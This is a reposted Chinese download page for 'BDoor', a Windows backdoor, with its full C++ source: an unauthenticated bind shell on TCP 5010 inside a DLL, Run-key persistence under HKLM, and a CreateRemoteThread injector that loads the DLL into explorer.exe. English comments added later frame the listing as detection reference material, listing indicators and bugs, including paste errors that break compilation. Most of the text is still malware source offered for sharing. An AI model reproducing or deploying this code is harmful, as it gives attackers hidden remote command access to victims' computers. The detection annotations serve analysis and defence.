后门程序BDoor及源码 (BDoor backdoor and its source code)

后门程序BDoor及源码 发布于:软件开发网 来源:互联网 作者:佚名 时间:2009-02-26 00:01



提交时间:2005-04-22
提交用户:ffantasyYD
工具分类:后门程序 (an unauthenticated TCP bind shell packaged as a DLL, with Run-key persistence and a CreateRemoteThread injector targeting explorer.exe; the listing below is reference material for analysis and detection)
运行平台:Windows
工具大小:316825Bytes
文件MD5:95e120d97967a3679dfdbd82985ea1ca
工具来源:http://www.uestc.edu.cn/web/default.aspx

这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。


//BDoor.cpp:DefinestheentrypointfortheDLLapplication.
//

#include"stdafx.h"
#include"winsock2.h"

#pragmacomment(lib,"ws2_32")

// Hard-coded indicators of this implant: the shell listens on TCP 5010 (see
// ControlThread) and persistence is written under the machine-wide Run key
// (the HKLM root is supplied by WriteReg).
#definePORT5010
#defineREG_RUN"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"

// Parameters handed to RecvThread/SendThread: the accepted client socket and
// the pipe end that thread bridges it to.
structTHREADPARAM
{
SOCKETsock;   // accepted client connection
HANDLEhandle; // pipe end: write end of cmd.exe's stdin pipe (RecvThread) or read end of its stdout pipe (SendThread)
};

// Thread entry points. None of them use the argument except BDoor/RecvThread/
// SendThread, which receive pointers into the creating thread's stack.
DWORDWINAPIControlThread(void*no); // listener: accept loop on TCP PORT, started from DllMain
DWORDWINAPIBDoor(void*lp);         // per-connection: spawns hidden cmd.exe and bridges it to the socket
DWORDWINAPIRecvThread(void*lp);    // socket -> cmd.exe stdin
DWORDWINAPISendThread(void*lp);    // cmd.exe stdout/stderr -> socket
DWORDWINAPIWriteReg(void*no);      // persistence: rewrites HKLM Run value "sysDll" every 5 s

// DLL entry point. On process attach it starts ControlThread (listener plus
// persistence thread) and returns immediately; the returned thread handle is
// discarded and never closed. Creating a thread from DllMain runs under the
// loader lock, which the DllMain best-practices documentation calls risky.
// Nothing is torn down on detach: the listening socket, the worker threads and
// any spawned cmd.exe live until the host process exits.
BOOLAPIENTRYDllMain(HANDLEhModule,
DWORD ul_reason_for_call,
LPVOIDlpReserved
)
{
switch(ul_reason_for_call)
{
caseDLL_PROCESS_ATTACH:
{
// Fire and forget; no synchronisation with the loader.
::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
break;
}

caseDLL_PROCESS_DETACH:
{
// No cleanup.
break;
}
}
returnTRUE;
}

// Listener thread started from DllMain. First starts the persistence thread
// (WriteReg), then binds a TCP socket on every interface (S_addr = 0, i.e.
// INADDR_ANY) at port PORT and hands each accepted connection to a BDoor
// thread. The accept loop is infinite, so the closesocket/WSACleanup at the
// bottom is unreachable and the function never returns on the normal path.
// Error paths return -1, which is 0xFFFFFFFF for a DWORD thread exit code;
// the socket() failure path does not call WSACleanup.
// Detection note: once injected (see DllInjection.cpp) the host process,
// explorer.exe, owns a LISTENING socket on 0.0.0.0:5010.
DWORDWINAPIControlThread(void*no)
{
// Persistence runs in its own thread so it never blocks the listener.
// Thread handle discarded, never closed.
CreateThread(NULL,0,WriteReg,NULL,0,NULL);

WSADATAwsaData;
SOCKETlistenSock;
if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
return-1;
}

if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
return-1;
}

sockaddr_inlocalAddr,inAddr;
intaddrLen=sizeof(inAddr);

// Only family, address and port are set; sin_zero is left uninitialised.
localAddr.sin_addr.S_un.S_addr=0;
localAddr.sin_family=AF_INET;
localAddr.sin_port=htons(PORT);
if(bind(listenSock,(sockaddr*)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
{
closesocket(listenSock);
return-1;
}
// Return value of listen() is not checked.
listen(listenSock,5);

while(TRUE)
{
// NOTE(review): acceptSock is a loop-local and its ADDRESS is passed to the
// new thread. BDoor dereferences it on entry, and only the Sleep(100) below
// keeps the next accept() from overwriting the slot first. accept() is not
// error-checked either: INVALID_SOCKET is handed to a BDoor thread like any
// other value. The thread handle is never closed.
SOCKETacceptSock=accept(listenSock,(sockaddr*)&inAddr,&addrLen);
DWORDID;
CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
Sleep(100);
}

// Unreachable.
closesocket(listenSock);
::WSACleanup();
}

// Persistence thread. Builds %SystemDirectory%\DllInjection.exe and writes it
// to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run as value "sysDll",
// then rewrites it every 5 seconds for the life of the host process, so a
// manual deletion of the value is undone within seconds while the DLL is
// loaded. Return values of RegSetValueEx are ignored; writing under HKLM
// normally needs elevation, so in a non-elevated host the write fails and
// nothing here notices. The argument is unused.
// Detection note: repeated registry value writes (e.g. Sysmon event 13) to
// ...\CurrentVersion\Run\sysDll every ~5 s, from the injected host process.
DWORDWINAPIWriteReg(void*no)
{
charsysPath[MAX_PATH]={0};
// ret is the number of characters written. If GetSystemDirectory fails
// (ret == 0) the next line indexes sysPath[-1].
intret=::GetSystemDirectory(sysPath,MAX_PATH);
if(sysPath[ret-1]!='\\')
strcat(sysPath,"\\");
strcat(sysPath,"DllInjection.exe");
intlen=strlen(sysPath);
while(TRUE)
{
HKEYhKey;
// On open failure this retries immediately with no delay (busy loop).
if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
continue;
// cbData is strlen() only; REG_SZ data is documented to include the
// terminating NUL. Result ignored.
::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE*)sysPath,len);

::RegCloseKey(hKey);
Sleep(5000);
}
return0; // unreachable
}

// Per-connection shell handler. Spawns a hidden %SystemDirectory%\cmd.exe with
// stdin/stdout/stderr redirected through two anonymous pipes, then bridges the
// pipes to the client socket with RecvThread (socket -> stdin) and SendThread
// (stdout/stderr -> socket). There is no authentication of any kind: whoever
// connects to the port gets an interactive cmd.exe running under the host
// process's token (the logged-on user's, when the host is explorer.exe).
// lp points at the SOCKET variable in ControlThread's accept loop and is
// dereferenced immediately. The session ends when RecvThread returns.
DWORDWINAPIBDoor(void*lp)
{
SOCKETsock=*((SOCKET*)lp);
HANDLEhCmdOut,hCmdIn,hRead,hWrite;

// Inheritable handles so the child cmd.exe can use the pipe ends.
SECURITY_ATTRIBUTESsec={0};
sec.nLength=sizeof(sec);
sec.lpSecurityDescriptor=NULL;
sec.bInheritHandle=TRUE;

// Pipe 1: hWrite (written by RecvThread) -> hCmdIn  (child's stdin)
// Pipe 2: hCmdOut (written by the child)  -> hRead   (read by SendThread)
// Return values are not checked.
CreatePipe(&hCmdIn,&hWrite,&sec,0);
CreatePipe(&hRead,&hCmdOut,&sec,0);

charcmdDir[MAX_PATH]={0};
::GetSystemDirectory(cmdDir,MAX_PATH);
if(cmdDir[strlen(cmdDir)-1]!='\\')
strcat(cmdDir,"\\");
strcat(cmdDir,"cmd.exe");

// Hidden window; std handles taken from the pipes above.
STARTUPINFOstartUpInfo={0};
startUpInfo.cb=sizeof(startUpInfo);
startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startUpInfo.wShowWindow=SW_HIDE;
startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
startUpInfo.hStdInput=hCmdIn;

PROCESS_INFORMATIONprocessInfo={0};
// bInheritHandles = TRUE with no attribute list: every inheritable handle in
// the host process is inherited by cmd.exe, not just the pipe ends.
intret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
if(ret==0)
{
// Failure path leaks all four pipe handles and the client socket.
return-1;
}
// The parent no longer needs the child's ends of the pipes.
CloseHandle(hCmdIn);
CloseHandle(hCmdOut);

DWORDID1,ID2;
HANDLEhRecvThread,hSendThread;
// Both parameter structs live on this thread's stack. The workers copy them
// on entry, and this thread stays blocked below until the session ends, so
// the pointers remain valid for as long as the workers run.
THREADPARAMrecvParam={0},sendParam={0};

recvParam.sock=sock;
recvParam.handle=hWrite;
hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);

sendParam.sock=sock;
sendParam.handle=hRead;
hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);

// The session ends when RecvThread exits (peer closed the socket or sent
// "exit\r\n"). SendThread and cmd.exe are then killed outright rather than
// shut down. processInfo.hProcess/hThread and the two worker thread handles
// are never closed.
ULONGcode;
::WaitForSingleObject(hRecvThread,INFINITE);
::GetExitCodeThread(hSendThread,&code);
::TerminateThread(hSendThread,code);
::GetExitCodeProcess(processInfo.hProcess,&code);
::TerminateProcess(processInfo.hProcess,code);
closesocket(sock);
CloseHandle(hWrite);
CloseHandle(hRead);
return0;
}

// Socket -> cmd.exe stdin. Reads the client one byte at a time, echoes each
// byte straight back to the client, and accumulates a line in cmd[]; on '\n'
// the whole line is written to the shell's stdin pipe, unless it equals
// "exit\r\n" (case-insensitive), which ends the session. A bare "exit\n"
// does not match and is passed to cmd.exe as a command instead.
// Returns when the peer closes the connection (recv == 0) or on "exit\r\n".
DWORDWINAPIRecvThread(void*lp)
{
charcmd[256]={0};
// Copied: the caller's struct lives on BDoor's stack.
THREADPARAMparam=*((THREADPARAM*)lp);
while(1)
{
chartemp[2]={0};
intret=recv(param.sock,temp,1,0);
if(ret==0)
{
break; // peer closed the connection
}
elseif(ret==1)
{
// Echo the byte back; send() result ignored.
send(param.sock,temp,1,0);
// NOTE(review): unbounded strcat into a 256-byte stack buffer. A client
// that sends more than 255 bytes without a '\n' overflows cmd[] and
// corrupts this stack frame inside the host process (explorer.exe) --
// a remote crash of the host at minimum.
strcat(cmd,temp);
if(temp[0]=='\n')
{
if(_stricmp(cmd,"exit\r\n")==0)
{
break;
}
ULONGlen;
// Forward the complete line to the shell; result ignored.
::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
memset(cmd,0,256);
}
}
// ret == SOCKET_ERROR (-1) is not handled: on a failed socket the loop
// spins forever instead of exiting.
}
return0;
}

// cmd.exe stdout/stderr -> socket. Every 100 ms it peeks the read end of the
// output pipe and, if data is pending, reads up to 1024 bytes and sends them
// to the client. Infinite loop: it is only ever ended by BDoor's
// TerminateThread, so "return 0" is unreachable. PeekNamedPipe, ReadFile and
// send() results are all ignored.
DWORDWINAPISendThread(void*lp)
{
// Copied: the caller's struct lives on BDoor's stack.
THREADPARAMparam=*((THREADPARAM*)lp);
charbuf[1024]={0};
while(1)
{
ULONGlen=0;
// Peek first so ReadFile is only called when data is pending.
::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
if(len>0)
{
::ReadFile(param.handle,buf,1024,&len,NULL);
send(param.sock,buf,len,0);
memset(buf,0,1024);
}
Sleep(100);
}
return0; // unreachable
}

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//DllInjection.cpp:Definestheentrypointfortheapplication.
//

#include"stdafx.h"
#include"windows.h"
#include"stdlib.h"
#include"tlhelp32.h"

#include"io.h"

// PID of the first running process whose executable base name (no path, no
// extension) equals processName case-insensitively; -1 if none is found.
longGetProcessID(char*processName);

// Launcher / injector (this is the executable the Run key points at). After a
// 5 s delay it locates explorer.exe, allocates a buffer in it, writes the path
// %SystemDirectory%\BDoor.dll there and starts a remote thread whose entry
// point is kernel32!LoadLibraryA with that buffer as the argument -- the
// classic CreateRemoteThread DLL-injection pattern. BDoor.dll's DllMain then
// opens the listener inside explorer.exe. Every failure path returns -1
// silently; hProcess is leaked on the failure paths after OpenProcess.
// Detection note: OpenProcess(all access) on explorer.exe followed by
// VirtualAllocEx / WriteProcessMemory / CreateRemoteThread from a binary in
// System32 (e.g. Sysmon event 8: source DllInjection.exe, target explorer.exe,
// start address inside kernel32).
intAPIENTRYWinMain(HINSTANCEhInstance,
HINSTANCEhPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//TODO:Placecodehere.
// Fixed delay, presumably to let the desktop come up after autostart.
Sleep(5000);
longID=GetProcessID("explorer");
if(ID==-1)
return-1;

HINSTANCEhDll;
HINSTANCE(*pProc)(LPCTSTR);
DWORD(WINAPI*pThreadProc)(void*);
// The local address of LoadLibraryA is reused in the target; this relies on
// kernel32 being mapped at the same base address in both processes.
if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
return-1;
if((pProc=(HINSTANCE(*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL)
return-1;
pThreadProc=(DWORD(WINAPI*)(void*))pProc;

// NOTE: "PROCESS_ALL_Access" is not a Win32 constant name (note the casing);
// as posted this line does not compile.
HANDLEhProcess=::OpenProcess(PROCESS_ALL_Access,TRUE,ID);
if(hProcess==NULL)
return-1;

charpDllPath[MAX_PATH]={0};
char*pRemoteAddr=NULL;
// If GetSystemDirectory fails (ret == 0) the next line indexes pDllPath[-1].
intret=::GetSystemDirectory(pDllPath,MAX_PATH);
if(pDllPath[ret-1]!='\\')
strcat(pDllPath,"\\");
strcat(pDllPath,"BDoor.dll");
// The DLL must already be present in System32; nothing here drops it.
if(::_access(pDllPath,0)==-1)
return-1;

// An operator between strlen(pDllPath) and 1 was lost in the paste (same on
// the VirtualFreeEx line below); as posted this does not compile.
pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath) 1,MEM_COMMIT,PAGE_READWRITE);
if(pRemoteAddr==NULL)
return-1;
// Writes strlen() bytes with no terminator; the remote string is only
// NUL-terminated because freshly committed pages are zero-filled.
ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
if(ret==0)
return-1;

// Remote thread entry = LoadLibraryA, parameter = path buffer in the target.
// The returned handle is neither checked nor closed.
HANDLEhRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);

// Nothing waits on hRemoteThread: after 100 ms the path buffer is decommitted
// whether or not the remote LoadLibraryA has consumed it yet.
Sleep(100);
::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath) 1,MEM_DECOMMIT);
::CloseHandle(hProcess);
return0;
}

// Walks a Toolhelp process snapshot and returns the PID of the first process
// whose executable base name (directory and extension stripped via
// _splitpath) equals processName case-insensitively -- so "explorer" matches
// explorer.exe. Returns -1 if the snapshot or first entry fails or nothing
// matches. The snapshot handle is never closed on any path.
// NOTE: CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE,
// not NULL, so the NULL check below never fires on failure.
longGetProcessID(char*processName)
{
HANDLEhSnapshot;
PROCESSENTRY32pe32={0};
BOOLfRet;

hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot==NULL)
return-1;

pe32.dwSize=sizeof(PROCESSENTRY32);
fRet=Process32First(hSnapshot,&pe32);
if(!fRet)
return-1;

intg=0; // found flag
chardrive[_MAX_DRIVE]={0};
chardir[_MAX_DIR]={0};
charfname[_MAX_FNAME]={0};
charext[_MAX_EXT]={0};
do
{
// Compare only the file name component; path and extension are ignored.
_splitpath(pe32.szExeFile,drive,dir,fname,ext);
if(_stricmp(processName,fname)==0)
{
g=1;
break;
}
}while(Process32Next(hSnapshot,&pe32));
if(g!=1)
return-1;

returnpe32.th32ProcessID;
}